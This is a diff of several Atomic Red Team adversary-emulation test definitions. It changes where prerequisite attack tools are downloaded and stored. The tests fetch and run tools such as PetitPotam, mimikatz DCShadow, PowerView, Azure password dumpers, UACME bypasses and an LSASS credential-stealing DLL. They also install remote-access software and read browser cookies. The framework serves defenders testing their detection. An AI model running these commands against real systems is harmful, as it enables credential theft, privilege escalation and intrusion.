       Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}"
   executor:
     name: powershell

atomics/T1207/T1207.yaml

@@ -32,11 +32,11 @@ atomic_tests:
     mimikatz_path:
       description: Mimikatz windows executable
       type: path
-      default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe'
     psexec_path:
       description: Path to PsExec
       type: path
-      default: C:\PSTools\PsExec.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -57,16 +57,16 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
       New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force
   executor:
     name: powershell
     elevation_required: true
     command: |
       # starting fake DC server, as SYSTEM (required)
-      $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
+      $dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log"
       Remove-Item $dc_output_file -ErrorAction Ignore
       $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
       $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"

atomics/T1219/T1219.yaml

@@ -98,7 +98,7 @@ atomic_tests:
     Ammyy_Admin_Path:
       description: Path of Ammyy Admin executable
       type: path
-      default: $env:temp\ammyy.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -106,7 +106,8 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "$env:temp\ammyy.exe" -UseBasicParsing
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe" -UseBasicParsing
   executor:
     command: |
       Start-Process #{Ammyy_Admin_Path}
@@ -125,7 +126,7 @@ atomic_tests:
     RemotePC_Path:
       description: Path of RemotePC executable
       type: path
-      default: $env:temp\RemotePC.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\RemotePC.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -133,6 +134,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe" -OutFile "#{RemotePC_Path}" -UseBasicParsing
   executor:
     command: |
@@ -160,7 +162,7 @@ atomic_tests:
     NetSupport_Path:
       description: Path to the NetSupport executable.
       type: path
-      default: $env:temp\T1219_NetSupport.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1219_NetSupport.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -168,6 +170,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       (New-Object Net.WebClient).DownloadFile("https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe","#{NetSupport_Path}")
   executor:
     command: |
@@ -186,7 +189,7 @@ atomic_tests:
     UltraViewer_Path:
       description: Path to the UltraViewer executable.
       type: path
-      default: $env:temp\T1219_UltraViewer.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1219_UltraViewer.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -194,6 +197,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       (New-Object Net.WebClient).DownloadFile("https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe","#{UltraViewer_Path}")
   executor:
     command: |
@@ -222,8 +226,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic
-      start-process $env:temp\vncsetup.exe /silent
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe"
+      start-process PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe /silent
   executor:
     command: |
       Start-Process #{UltraVNC_Viewer_Path}
@@ -250,8 +255,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1}
     get_prereq_command: |
-       Invoke-WebRequest -OutFile $env:temp\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9"
-       start-process $env:temp\msp360connect.exe /S    
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9"
+      start-process PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe /S    
   executor:
     command: |
       Start-Process #{MSP360_Connect_Path}

atomics/T1482/T1482.yaml

@@ -44,9 +44,10 @@ atomic_tests:
   - description: |
       PowerView PowerShell script must exist on disk
     prereq_command: |
-      if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+      if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
   - description: |
       RSAT PowerShell AD admin cmdlets must be installed
     prereq_command: |
@@ -55,7 +56,7 @@ atomic_tests:
       Write-Host "Sorry RSAT must be installed manually"
   executor:
     command: |
-      Import-Module "$env:TEMP\PowerView.ps1"
+      Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
       Get-NetDomainTrust
       Get-NetForestTrust
       Get-ADDomain
@@ -147,7 +148,7 @@ atomic_tests:
     trufflesnout_path:
       description: Path to the TruffleSnout executable
       type: path
-      default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe
     domain:
       description: Domain name to search on
       type: string

atomics/T1485/T1485.yaml

@@ -12,11 +12,11 @@ atomic_tests:
     sdelete_exe:
       description: Path of sdelete executable
       type: path
-      default: $env:TEMP\Sdelete\sdelete.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe
     file_to_delete:
       description: Path of file to delete
       type: path
-      default: $env:TEMP\T1485.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1485.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -24,9 +24,10 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
-      Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-      Remove-Item $env:TEMP\SDelete.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip PathToAtomicsFolder\..\ExternalPayloads\Sdelete -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip -Force
   executor:
     command: |
       if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }

atomics/T1486/T1486.yaml

@@ -265,8 +265,9 @@ atomic_tests:
       prereq_command: |
         if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1}
       get_prereq_command: |
-        invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "$env:temp\gpginstall.exe"
-        cmd /c "$env:temp\gpginstall.exe" /S
+        New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+        invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
+        cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
   executor:
     name: powershell
     elevation_required: false

atomics/T1526/T1526.yaml

@@ -29,11 +29,12 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      The Get-AzDomainInfo script must exist in $env:temp.
+      The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\Get-AzDomainInfo.ps1){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "$env:temp\Get-AzDomainInfo.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1"
   - description: |
       The Az module must be installed.
     prereq_command: |
@@ -42,7 +43,7 @@ atomic_tests:
       Install-Module -Name Az -Force
   executor:
     command: |
-      import-module "$env:temp\Get-AzDomainInfo.ps1"
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1"
       $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
       Connect-AzAccount -Credential $Credential | out-null

atomics/T1528/T1528.yaml

@@ -28,11 +28,12 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      The Get-AzurePasswords script must exist in $env:temp.
+      The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\Get-AzurePasswords.ps1){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "$env:temp\Get-AzurePasswords.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
   - description: |
       The Azure RM module must be installed.
     prereq_command: |
@@ -47,7 +48,7 @@ atomic_tests:
       Install-Module -Name Azure -Force -allowclobber
   executor:
     command: |
-      import-module "$env:temp\Get-AzurePasswords.ps1"
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
       $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
       Connect-AzureRmAccount -Credential $Credential

atomics/T1530/T1530.yaml

@@ -20,24 +20,25 @@ atomic_tests:
     wordlist:
       description: File path to keywords for search permutations
       type: string
-      default: $env:temp\permutations.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      The Invoke-EnumerateAzureBlobs module must exist in $env:temp.
+      The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "$env:temp\Invoke-EnumerateAzureBlobs.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
   - description: |
-      The wordlist file for search permutations must exist in $env:temp.
+      The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
       if (test-path #{wordlist}){exit 0} else {exit 1}
     get_prereq_command: |
       invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
   executor:
     command: |
-      import-module "$env:temp\Invoke-EnumerateAzureBlobs.ps1"
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
       Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"
     cleanup_command: |
       remove-item #{output_file} -erroraction silentlycontinue

atomics/T1539/T1539.yaml

@@ -13,11 +13,11 @@ atomic_tests:
     sqlite3_path:
       description: Path to sqlite3
       type: path
-      default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe
     output_file:
       description: Filepath to output cookies
       type: path
-      default: $env:temp\T1539FirefoxCookies.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -25,8 +25,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip"
-      Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
+      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
   executor:
     command: |
       stop-process -name "firefox" -force -erroraction silentlycontinue
@@ -53,11 +54,11 @@ atomic_tests:
     sqlite3_path:
       description: Path to sqlite3
       type: path
-      default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe
     output_file:
       description: Filepath to output cookies
       type: path
-      default: $env:temp\T1539ChromeCookies.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -65,8 +66,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip"
-      Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
+      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
   executor:
     command: |
       stop-process -name "chrome" -force -erroraction silentlycontinue

atomics/T1546.015/T1546.015.yaml

@@ -17,7 +17,7 @@ atomic_tests:
     dllpath:
       description: Path to the DLL.
       type: string
-      default: $env:TEMP\AtomicTest.dll
+      default: PathToAtomicsFolder\..\ExternalPayloads\AtomicTest.dll
     clsid:
       description: Class ID to hijack.
       type: string
@@ -30,7 +30,9 @@ atomic_tests:
   dependencies:
   - description: DLL For testing
     prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}'
-    get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
   executor:
     command: |-
       New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
@@ -72,7 +74,7 @@ atomic_tests:
     dll_path:
       description: Path to the DLL.
       type: string
-      default: $env:temp\T1546.015_calc.dll
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1546.015_calc.dll
     clsid:
       description: Class ID to hijack.
       type: string
@@ -85,7 +87,9 @@ atomic_tests:
   dependencies:
   - description: DLL For testing
     prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}'
-    get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
   executor:
     command: |-
       New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'

atomics/T1547.008/T1547.008.yaml

@@ -15,7 +15,7 @@ atomic_tests:
     dll_path:
       description: Module to be loaded into LSASS
       type: path
-      default: '$env:TEMP\lsass_lib.dll'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\lsass_lib.dll'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -24,6 +24,7 @@ atomic_tests:
       if (Test-Path #{dll_path}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}"
   executor:
     command: |

atomics/T1548.002/T1548.002.yaml

@@ -214,7 +214,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\23 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -223,9 +223,11 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -260,7 +262,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\31 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -269,9 +271,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -306,7 +309,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\33 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -315,9 +318,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -352,7 +356,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\34 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -361,9 +365,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -398,7 +403,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
-      default: '%temp%\uacme\39 Akagi64.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -407,9 +412,10 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
-      Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
-      Remove-Item $env:TEMP\uacme.zip -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force
   executor:
     command: |
       "#{uacme_exe}"
@@ -444,7 +450,7 @@ atomic_tests:
     uacme_exe:
       description: Path to uacme executable
       type: path
